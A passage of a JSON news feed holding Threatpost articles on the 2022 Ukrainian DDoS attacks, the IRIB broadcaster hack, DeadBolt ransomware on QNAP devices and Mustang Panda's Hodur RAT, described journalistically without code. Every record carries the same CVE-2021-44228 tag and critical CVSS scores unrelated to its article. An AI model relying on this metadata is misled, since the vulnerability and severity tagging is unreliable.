largest commercial bank, servicing nearly [20 million](<https://en.privatbank.ua/about>) customers. Oschadbank and Privatbank are considered \u201c[systemically important](<https://bank.gov.ua/en/news/all/natsionalniy-bank-onoviv-perelik-sistemno-vajlivih-bankiv>)\u201d to Ukraine\u2019s financial markets.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nAdam Meyers, senior vice president of intelligence at CrowdStrike, said via email that the attacks consisted of \u201ca large volume of traffic, three orders of magnitude more than regularly observed traffic, with 99 percent of this traffic consisting of HTTPs requests.\u201d\n\n## **What Happened?**\n\nBy overloading targeted servers, this kind of DoS attack ensured that end users couldn\u2019t access their websites, bank accounts and so on for a period of time. As Ukraine\u2019s Center for Strategic Communications noted in a Facebook [post](<https://www.facebook.com/StratcomCentreUA/posts/290808713119116>), some Privatbank customers found themselves \u201ccompletely unable to access\u201d the company\u2019s app, while others\u2019 accounts \u201cdo not reflect balance and recent transactions.\u201d\n\nSome customers received SMS messages claiming that ATMs were out of order, according to Ukraine\u2019s Cyberpolice, which [tweeted](<https://twitter.com/CyberpoliceUA/status/1493578811492950020>) the claim. Those reports however were debunked, [according to](<https://www.npr.org/2022/02/15/1080876311/ukraine-hack-denial-of-service-attack-defense>) NPR.\n\nCrucially, the attackers disrupted the _availability _of these websites and services, but not the _integrity _of any data. Thus, the transactions, balances and private information associated with bank accounts and military databases appear to be untainted, according to reports.\n\n[And, according](<https://cip.gov.ua/en/news/shodo-kiberataki-na-saiti-viiskovikh-struktur-ta-derzhavnikh-bankiv>) to Ukraine\u2019s State Special Communications Service, a \u201cworking group of experts\u201d convened yesterday to take \u201call necessary measures to localize and resist the cyberattack.\u201d All affected banking services had resumed by 7:30 p.m. local time on Tuesday, and the websites for the Armed Forces and Ministry of Defense have since been restored.\n\n\u201cThe DDoS attacks against the Ukrainian defense ministry and financial institutions appear to be harassment similar to the previous DDoS attacks [seen in January](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>),\u201d Rick Holland, CISO at Digital Shadows, said via email. \u201cThey could be a precursor to a significant attack or a component of a broader campaign to intimidate and confuse Ukraine.\u201d\n\n## **Part of a Much Broader Campaign**\n\nWhile limited in impact, these events have come mere hours after the Security Service of Ukraine\u2019s (SSU) [reported](<https://ssu.gov.ua/en/novyny/zaiava-sbu-shchodo-proiaviv-hibrydnoi-viiny-v-informatsiinomu-prostori>) a \u201cmassive wave of hybrid warfare\u201d \u2013 [120](<https://ssu.gov.ua/en/novyny/u-sichni-2022-roku-sbu-zablokuvala-ponad-120-kiberatak-na-ukrainski-orhany-vlady>) cyberattacks against government authorities, and a fake news botnet of more than [18,000](<https://ssu.gov.ua/en/novyny/sbu-likviduvala-18ty-tysiachnu-botofermu-u-lvovi-pid-kuratorstvom-rf-siialy-paniku-ta-minuvaly-obiekty-video>) social-media accounts \u2013 all designed to \u201csystemically sow panic, spread fake information and distort the real state of affairs\u201d in the country.\n\nThe SSU attributed this wave of hostile activity to a single unnamed but obvious \u201caggressor state.\u201d\n\nLikewise, Tuesday\u2019s attacks have not been officially attributed. Still, their timing, as Russia mobilizes more than 100,000 troops at Ukraine\u2019s northeast border, is inspiring speculation.\n\n\u201cIt would be no surprise,\u201d wrote Mike McLellan, director of intelligence at SecureWorks, via email, \u201cif it transpires that they are the result of cyberattacks conducted by Russia, or by threat actors with a pro-Russian agenda.\u201d\n\nHe added, \u201cRussia has a history of cyberattacks \u201cdesigned to distract the Ukrainian government and critical infrastructure operators and undermine the trust among the Ukrainian population.\u201d\n\nAnd indeed, in the past two months, Russian- advanced persistent threats (APTs) have been tied to an [attack](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>) on 70 Ukrainian government websites, a [wiper](<https://threatpost.com/destructive-wiper-ukraine/177768/>) targeting government, non-profit and IT organizations, and increased [attacks and espionage](<https://threatpost.com/gamaredon-apt-toolset-ukraine/152568/>) against military targets.\n\nIt\u2019s also worth noting that the 2014 Russian invasion of Crimea [coincided with](<https://resources.infosecinstitute.com/topic/crimea-russian-cyber-strategy-hit-ukraine/>) an outbreak of the [Turla virus](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>), and targeted espionage attacks against government agencies, politicians and businesses.\n\nOthers however noted that there could be many beneficiaries to the fog of potential war.\n\n\u201cWhat could be a more likely scenario [than Russia carrying out the attacks] is that other countries like China and Iran take advantage of the chaos and fog of war to further their interests and conduct their campaigns against the West,\u201d Holland noted. \u201cAs the saying goes, \u2018never let a good crisis go to waste.\u2019 The risk of these types of false-flag operations could have unintended consequences, and you can\u2019t close Pandora\u2019s Box once it\u2019s opened.\u201d\n\nTim Wade, technical director and deputy CTO at Vectra, cautioned against hasty attribution.\n\n\u201cThere are no shortage of actors that could stand to benefit from chaos or disruption \u2013 ranging from criminal actors to nation states \u2013 and that, unlike Hollywood movies, real motivations can be tricky to unwind,\u201d he said via email.\n\n## **Could Ukraine\u2019s Problems Migrate West?**\n\nBesides the direct threat to Ukrainians, increasing cyber-disruption in the region could spill over to affect American and European countries and businesses.\n\nPrior attacks against Ukrainian targets have crippled companies that simply do business or passively interact with Ukrainian organizations. Famously, the 2017 [NotPetya malware](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) that breached a Kiev-based accounting software vendor ended up causing [billions of dollars of damage](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) to multinational corporations like Maersk, Merck and FedEx.\n\nGovernment officials have been warning of the potential for similar attacks directed at the United States government and its critical industries. A January [bulletin](<https://info.publicintelligence.net/DHS-UkraineInvasionCyberAttacks.pdf>) from the Department of Homeland Security (DHS) concluded that \u201cRussia would consider initiating a cyberattack against the Homeland if it perceived a U.S. or NATO response to a possible Russian invasion of Ukraine threatened its long-term national security.\u201d\n\nThe [_DHS and FBI this week also warned_](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUfnCpRAdaEZ-2Fzb6CvhwO2WfCysAcwxa-2FOx6Xho58-2BYfSYyLoJDjBKk191ALVSfQe7tKhtpt14nvCWvRWtjQ5ia-2Bxy-2FAHNuEWnCoDD4HJMf8OJPniUjq-2B73i7hrTuhggh8r40SSt8yAJN6BeVN-2BkmdzRhazj8-2BjAsse8M0ns4vlmM4yK8nCFV0oUzvOT01MzpXw-3D-3DEQ6l_ZRLSPEhX0sWy6v6-2FW4BoBGwvynWnvEEKCCoI2tE2RSv7Ap1BbaYTRGgOsmBtH3N8QKMiyASu9uND9imXoTFn2JxQFydFAQqAST8UQ4mPJ45BLqxiPCRq-2F8g1sIIIifFF67f6vand8CQnio175DMlDx-2BtZjU9X-2BUnk00U6HL2Yt4yyDbwA5dz19QLe0tu0POPLp-2Fgsr5OJD90lYAoTgrjHLrtnapc4YpMEy1t1oB-2FDSc0tf3yxTecOYhCatjqqOm4kJQYHeuGl-2BEr4Nvd1gCZbw27qOfv2B-2BBdgMuXjXMnP622px6wYmsEQxT8XmTUE4Kp48bq-2BYS-2BZ-2BxIiX-2Fk3HtqWfdoiM23ih4UUMDkfkykO0-3D>) of an uptick in Russian scanning of domestic law-enforcement networks and other American targets.\n\nSecurity researchers noted that it\u2019s important to be wary as the geo-political tensions continue \u2014 given that the chaos that would arise from a full-blown Russian incursion would provide plenty of cover for cyberattackers of all stripes.\n\nAs Crowdstrike\u2019s Meyers said, \u201cwhile there is no evidence of any targeting of western entities at this time, there is certainly potential for collateral impact as a result of disruptive or destructive attacks targeting Ukraine \u2013 this could impact companies that have a presence in Ukraine, those that do business with Ukrainian companies, or have a supply chain component in Ukraine such as code development/offshoring.\u201d\n\nWould the U.S. be ready in such a scenario? Last week, DHS officials [_told American cities_](<https://www.usatoday.com/story/news/politics/2022/02/08/local-government-cybersecurity-digital-threats/9208951002/?gnt-cfr=1>) that they were extra-vulnerable to wipers that could result in polluting a water supply or crashing a power grid. And it\u2019s worth noting that, according to [data](<https://www.cyberseek.org/heatmap.html>) from Cyber Seek, 600,000 cybersecurity roles across the nation are currently vacant, meaning that many organizations are understaffed for incident response.\n\n\u201cAre these attacks part of nation-state aggression? Or criminal opportunists exploiting a tense situation? Or just entirely coincidental? While answering with any certainty may be tough, what isn\u2019t difficult is drawing clear line of sight to the significance of cyber-resilience as it relates to critical services and infrastructure,\u201d Vectra\u2019s Wade noted. \u201cToday, everyone operating something of value has a target on their back and we\u2019d all do well to prepare for the inevitability of the consequences of that fact.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T16:04:36", "type": "threatpost", "title": "Ukrainian DDoS Attacks Should Put US on Notice\u2013Researchers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T16:04:36", "id": "THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "href": "https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:47", "description": "Footage of opposition leaders calling for the assassination of Iran\u2019s Supreme Leader ran on several of the nation\u2019s state-run TV channels in late January after a state-sponsored cyber-attack on Iranian state broadcaster IRIB.\n\nThe incident \u2013 one of a series of politically motivated attacks in Iran that have occurred in the last year \u2013 included the use of a wiper that potentially ties it to a previous high-profile attack on Iran\u2019s national transportation networks in July, according to researchers from Check Point Research.\n\nHowever, though the earlier attacks have been attributed to [Iran state-sponsored actor Indra](<https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/>), researchers believe a copycat actor was behind the IRIB attack based on the malware and tools used in the attack, they said in a [report](<https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/>) published Friday.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n\u201cAmong the tools used in the attack, we identified malware that takes screenshots of the victims\u2019 screens, several custom-made backdoors, and related batch scripts and configuration files used to install and configure the malicious executables,\u201d researchers wrote in the report. \u201cWe could not find any evidence that these tools were used previously, or attribute them to a specific threat actor.\u201d\n\nThe disruptive attack on IRIB occurred on Jan. 27, with attackers showing a savviness and knowledge of how to infiltrate systems that suggest it may also have been an inside job, researchers said.\n\nThe attack managed to bypass security systems and network segmentation, penetrate the broadcaster\u2019s networks, and produce and run the malicious tools that relied on internal knowledge of the broadcasting software used by victims, \u201call while staying under the radar during the reconnaissance and initial intrusion stages,\u201d they noted.\n\nIndeed, nearly two weeks after the attack happened, new affiliated with opposition party MEK [published](<https://english.mojahedin.org/news/iran-despite-utilizing-all-resources-after-12-days-regimes-radio-and-tv-networks-have-not-returned-to-a-normal-status/>) a status report of the attack claiming that state-sponsored radio and TV networks still had not returned to normal, and that more than 600 servers, advanced digital production, archiving, and broadcasting of radio and television equipment have been destroyed, according to the report.\n\n## **Spate of Attacks**\n\nIran\u2019s national infrastructure has been the victim of a wave of attacks aimed at causing serious disruption and damage. Two incidents that targeted national transportation infrastructure occurred in two subsequent days in July.\n\nOne was a [rail-transportation incident](<https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/>) \u2013 which disrupted rail service and also taunted Iran Supreme Leader Ayatollah Sayyid Ali Hosseini Khamenei via hacked public transit display screens. A day later, Iran\u2019s Ministry of Roads and Urban Development also [was hit with a cyber-attack](<https://www.reuters.com/world/middle-east/iran-transport-ministry-hit-by-second-apparent-cyberattack-days-2021-07-10/>) that took down employees\u2019 computer systems.\n\nThen in October, an attack on Iran\u2019s fuel-distribution network [stranded drivers](<https://threatpost.com/cyberattack-cripples-iranian-fuel-distribution-network/175794/>) at fuel pumps across the country by disabling government-issued electronic cards providing subsidies that many Iranians use to purchase fuel at discounted prices.\n\nCheck Point researchers analyzed tools in the IRIB cyber-attack and compared them with those of Indra, the group believed to be responsible for the previous attacks in Iran\u2019s infrastructure. Specifically, a novel wiper called Meteor \u2013 which not only wipes files but also can change users\u2019 passwords, disable screensavers, terminate processes and disable recovery mode, among other nefarious features \u2013 was used in both the railway and roads attacks.\n\nHowever, though a wiper was used against IRIB, it doesn\u2019t appear to be the same one. Nor are the threat actors behind it likely the same, though a copycat situation may be at play, researchers concluded.\n\n\u201cAlthough these wipers are coded and behave very differently, some implementation details such as execution based on batch files, or the password changing patterns ([random sequence]aA1! for this attack and Aa153![random sequence] in Indra\u2019s case), suggests that the attackers behind the IRIB hack may have been inspired by previous attacks [that] happened in Iran,\u201d they wrote in the report.\n\n## **Claiming Responsibility**\n\nIt\u2019s still unclear who, exactly, the perpetrators of the IRIB attack are, however. While Iranian officials believe the Iranian opposition political party MEK is behind the attack, the group itself has denied involvement, researchers said.\n\nFurther, hacktivist group Predatory Sparrow, which claimed responsibility for the previous three infrastructure attacks, also affiliated itself with the IRIB attack via its Telegram channel. However, this is unlikely, as \u201cno technical proof of the group\u2019s attribution to the attack has been discovered,\u201d according to Check Point.\n\nWhat is known about the threat actor, however, is that due to the relative complexity of the attack itself, the group \u201cmay have many capabilities that have yet to be explored,\u201d researchers noted.\n\nAt the same time, their reliance on IRIB insiders may have been the secret to the attackers\u2019 success, as the tools they used are of \u201crelatively low quality and sophistication, and are launched by clumsy and sometimes buggy 3-line batch scripts,\u201d according to Check Point.\n\n\u201cThis might support the theory that the attackers might have had help from inside the IRIB, or indicate a yet unknown collaboration between different groups with different skills,\u201d researchers noted.\n\n## **Specific Malware **\n\nWhile researchers said they are still not sure how the attackers gained initial access to IRIB networks, they managed to retrieve and analyze malware related to the later stages of the attack that did three things: established backdoors and their persistence, launched the video or audio track playing the assassination message, and installed the wiper to disrupt operations in the hacked networks.\n\nAttackers used four backdoor strategies in the attack: WinScreeny, HttpCallbackService, HttpService and ServerLaunch, a dropper launched with HttpService.\n\nWinScreeny is a backdoor with the main purpose of capturing screenshots of the victim\u2019s computer. HttpCallbackService is a remote-administration tool (RAT) that communicates with the command-and-control (C2) server every five seconds to receive commands to execute. HttpService is a backdoor that listens on a specified port and can execute commands, manipulate local files, download or upload files, or perform other malicious activities.\n\nFinally, the ServerLaunch dropper \u2013 which starts both httpservice2 and httpservice4, each of which has a different predefined port to listen on \u2013 likely allows the attackers to ensure some sort of redundancy of the C2 communication, researchers wrote.\n\n## **Hijacking the Video Stream**\n\nTo interrupt the TV stream and play the opposition\u2019s message, attackers used a program called SimplePlayout.exe, a .NET-based executable with a single functionality: to play a video file in a loop using the .NET MPlatform SDK by Medialooks.\n\nTo kill the video stream already playing so they could deploy their own, the attackers used a batch script called playjfalcfgcdq.bat, which killed the running process and deleted the executable of TFI Arista Playout Server, a software that the IRIB is [known](<http://rd.irib.ir/documents/25760057/f39f659c-8a0b-42f3-a1e9-d716cd5b8afe>) to use for broadcasting.\n\nAttackers connected the dots with a script, layoutabcpxtveni.bat, that made the necessary connections to replace the IRIB video content with their own through a series of functions, including the launch of SimplePlayout.exe, researchers wrote.\n\n## **The Wiper**\n\nIn analyzing the wiper used in the attacks, researchers found \u201ctwo identical .NET samples named msdskint.exe whose main purpose is to wipe the computer\u2019s files, drives, and MBR,\u201d they reported.\n\nThe malware also has the capability to clear Windows Event Logs, delete backups, kill processes and change users\u2019 passwords, among other features.\n\nTo corrupt files, the wiper has three modes: default, which overwrites the first 200 bytes of each chunk of 1024 bytes with random values; light-wipe, which overwrite a number of chunks specified in the configuration; and full_purge, which does just that \u2013 overwrites the entire file content.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T13:46:04", "type": "threatpost", "title": "Iranian State Broadcaster Clobbered by \u2018Clumsy, Buggy\u2019 Code", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-18T13:46:04", "id": "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "href": "https://threatpost.com/iranian-state-broadcaster-clumsy-buggy-code/178524/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-23T17:04:20", "description": "DeadBolt ransomware has resurfaced in a new wave of attacks on QNAP that begin in mid-March and signals a new targeting of the Taiwan-based network-attached storage (NAS) devices by the fledgling threat, researchers said.\n\nResearchers from Censys, which provides attack-surface management solutions, said they observed DeadBolt infections on QNAP gear ramp up slowly starting March 16, with a total of 373 infections that day. That number that rose to 1,146 devices by March 19, according to [a blog post](<https://censys.io/deadbolt-ransomware-is-back/>) by Censys senior security researcher Mark Ellzey.\n\nThe current attacks harken [back to January](<https://threatpost.com/conti-deadbolt-delta-qnap-ransomware/178083/>), when the company had to push out an unplanned update to its NAS devices, one that not all customers welcomed. The update was meant to clean up after DeadBolt attacks that were greeting customers with the ransomware group\u2019s screen when they logged in, effectively locking them out of the device.\n\nThe new wave of attacks ostensibly follow the same pattern as January\u2019s wave, but the majority of the victims are running the QNAP QTS Linux kernel version 5.10.60, Ellzey said. That\u2019s a later version than the update ([QTS 5.0.0.1891)](<https://www.qnap.com/en-us/release-notes/qts/5.0.0.1891/20211221>) pushed out to customers in January.\n\nThat said, \u201cat this time, Censys cannot state whether this is a new attack targeting different versions of the QTS operating system, or if it\u2019s the original exploit targeting unpatched QNAP devices,\u201d he acknowledged.\n\nMoreover, the new infections do not seem to be targeting a specific organization or country; they seem to be evenly split between subscribers of various consumer internet service providers, Ellzey added.\n\n## **D\u00e9j\u00e0 Vu for QNAP Customers**\n\nThe attacks behave the same as the January attacks as far as what the customers experience \u2014 and they ask for the same ransom as previous DeadBolt attacks on QNAP devices, Ellzey said.\n\n\u201cExcept for the [Bitcoin] addresses used to send ransoms to, the attack remains the same: backup files are encrypted, the web administration interface is modified, and victims are greeted with [ransom] messages,\u201d he wrote in the post.\n\nThe attackers are asking for 0.03 Bitcoin for a decryption key, which is about $1,223 at today\u2019s exchange rate. They\u2019re also asking for a ransom from QNAP itself: 5 bitcoin or $203,988, for information related to the vulnerabilities; and 50 bitcoin, or about $2 million, for a master key to unlock all affected victims, Ellzey said.\n\nQNAP is not the only company in the crosshairs of DeadBolt, which first came to researchers\u2019 attention due to the January attacks. In mid-February, Reddit users began reporting that the ransomware was targeting [ASUSTOR ADM devices](<https://www.asustor.com/service/release_notes#adm4>), according to Censys.\n\n## **Attack Detection**\n\nCensys researchers picked up on the latest wave of QNAP attacks due to the unique way the current DeadBolt ransomware variant communicates with victims, according to the post.\n\n\u201cInstead of encrypting the entire device, which effectively takes the device offline (and out of the purview of Censys), the ransomware only targets specific backup directories for encryption, and vandalizes the web-administration interface with an informational message explaining how to remove the infection,\u201d Ellzey wrote.\n\nTherefore, using [a simple search query](<https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=INCLUDE&q=services.http.response.html_title%3A+%22ALL+YOUR+FILES+HAVE+BEEN+LOCKED+BY+DEADBOLT.%22>), Censys \u201ccould easily find infected devices exposed on the public internet,\u201d according to the post.\n\nAlong with general information about what hosts were infected with DeadBolt, researchers also obtained and tracked every unique Bitcoin wallet address used as a ransom drop, Ellzey added.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-23T15:43:49", "type": "threatpost", "title": "DeadBolt Ransomware Resurfaces to Hit QNAP Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-23T15:43:49", "id": "THREATPOST:57F52943964BADEBC748C4AC796CEEB6", "href": "https://threatpost.com/deadbolt-ransomware-qnap-again/179057/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:33", "description": "The Chinese advanced persistent threat (APT) Mustang Panda (a.k.a. Temp.Hex, HoneyMyte, TA416 or RedDelta) has upgraded its espionage campaign against diplomatic missions, research entities and internet service providers (ISPs) \u2013 largely in and around Southeast Asia.\n\nFor one thing, the APT has deployed a brand-new, customized variant of an old but powerful remote-access tool (RAT) called PlugX (aka Korplug), according to researchers from ESET. They named this latest variant \u201cHodur,\u201d after a blind [Norse god](<https://en.wikipedia.org/wiki/H%C3%B6%C3%B0r>) known for slaying his thought-to-be-invulnerable half-brother Baldr.\n\nBeyond that, Mustang Panda has developed a complex array of tactics, techniques and procedures (TTPs) to maximize the efficacy of its attacks.\n\nESET researchers noted, \u201cEvery stage of the deployment process utilizes anti-analysis techniques and control-flow obfuscation.\u201d\n\nThe cyberespionage campaign dates back to at least last August and is still ongoing, according to ESET, and is targeting mainly governments and NGOs. Most victims are located in East and Southeast Asia, but there are outliers in Europe (Greece, Cyprus, Russia) and Africa (South Africa, South Sudan).\n\nThe attacks begin with social-engineering emails or watering-hole attacks, researchers said.\n\n\u201cThe compromise chain includes decoy documents that are frequently updated and relate to events in Europe [and the war in Ukraine],\u201d noted the team, in a [Wednesday posting](<https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/>). \u201cOne of the filenames related to this campaign is \u201cSituation at the EU borders with Ukraine.exe.\u201d\n\nOther phishing lures mention updated COVID-19 travel restrictions, an approved regional aid map for Greece, and a Regulation of the European Parliament and of the Council.\n\n\u201cThe final lure is a real document available on the European Council\u2019s website,\u201d according to ESET. \u201cThis shows that the APT group behind this campaign is following current affairs and is able to successfully and swiftly react to them.\u201d\n\n## What is Hodur?\n\nHodur derives [from PlugX](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/#:~:text=PlugX%20was%20first%20identified%20in,the%20infected%20system%3B%20and%20more.>), a RAT that \u201callows remote users to perform data theft or take control of the affected systems without permission or authorization. It can copy, move, rename, execute and delete files; log keystrokes; fingerprint the infected system; and more.\u201d\n\nPlugX is one of the oldest malware families around, having existed in some form or another since 2008, with a rise in popularity in the [mid-2010s](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>). Malware that old won\u2019t cut it these days, which is why Mustang Panda has constantly [iterated](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) on it. Even just a few weeks ago, researchers from Proofpoint [discovered](<https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european>) an upgrade \u201cchanging its encoding method and expanding its configuration capabilities.\u201d\n\nAccording to ESET, the new variant \u201cmostly lines up with other Korplug variants, with some additional commands and characteristics.\u201d It for instance closely resembles another Norse-themed variant \u2013 Thor \u2013 [discovered](<https://unit42.paloaltonetworks.com/thor-plugx-variant/>) in 2020.\n\n## Sophisticated Attack Chain\n\nHodur itself is hardly the star of the show: Mustang Panda\u2019s campaign features literally dozens of TTPs designed to establish persistence, collect data and evade defenses.\n\nAs mentioned, the campaign begins simply, as the group uses current events to phish their targets. For example, last month, Proofpoint discovered it puppeteering a NATO diplomat\u2019s email address to send out .ZIP and .EXE files titled \u201cSituation at the EU borders with Ukraine.\u201d\n\nIf a target falls for the bait, a legitimate, validly signed, executable vulnerable to DLL search-order hijacking, a malicious DLL, and an encrypted Hodur file are deployed on the target machine.\n\n\u201cThe executable is abused to load the module, which then decrypts and executes the\u2026RAT,\u201d explained researchers. \u201cIn some cases, a downloader is used first to deploy these files along with a decoy document.\u201d\n\nMustang Panda\u2019s campaigns then frequently use custom loaders for shared malware including Cobalt Strike, Poison Ivy, and now, Hodur. Then things get interesting. ESET analysts tallied a total of 44 MITRE ATT&CK techniques deployed in this campaign. Most interesting are the 13 different methods of obfuscating or otherwise evading cybersecurity tools and detection.\n\nFor example, the ESET blog noted that \u201cdirectories created during the installation process are set as hidden system directories,\u201d and \u201cfile and directory names match expected values for the legitimate app that is abused by the loader.\u201d\n\nAnd, the malware gaslights you because \u201cscheduled tasks created for persistence use legitimate-looking names,\u201d and \u201cwhen writing to a file, Korplug sets the file\u2019s timestamps to their previous values.\u201d\n\n## **Who\u2019s Behind Mustang Panda?**\n\nCybersecurity analysts have been tracking Mustang Panda [since 2017](<https://malpedia.caad.fkie.fraunhofer.de/actor/mustang_panda>), when they first started using Mongolian-themed phishing tactics to conduct espionage on targets in Southeast Asia. Still, there\u2019s much we don\u2019t know about the group.\n\nThe depth and complexity of their TTPs puts Mustang Panda more in the company of state-sponsored groups than criminal ones. So \u201cit is possible, though unproven, that they are state-sponsored or at least state-sanctioned,\u201d wrote Mike Parkin, senior technical engineer at Vulcan Cyber, via email.\n\nHistorically, the group has kept to Southeast Asia, with one notable exception \u2013 [the Vatican](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) \u2013 in 2020. The vast majority of targets in ongoing campaigns have, indeed, been located in Mongolia and Vietnam, followed closely by Myanmar. However, as mentioned, the list also includes select entities in Europe and Africa, which muddies the picture a bit.\n\n\u201cThe target distribution is interesting,\u201d Parkin concluded. \u201cThere isn\u2019t enough information publicly available here to determine the attacker\u2019s ultimate agenda.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T14:08:06", "type": "threatpost", "title": "Chinese APT Combines Fresh Hodur RAT with Complex Anti-Detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T14:08:06", "id": "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "href": "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:41", "description": "In late July 2021, online retailers got hit with a jaw-dropping 2,800 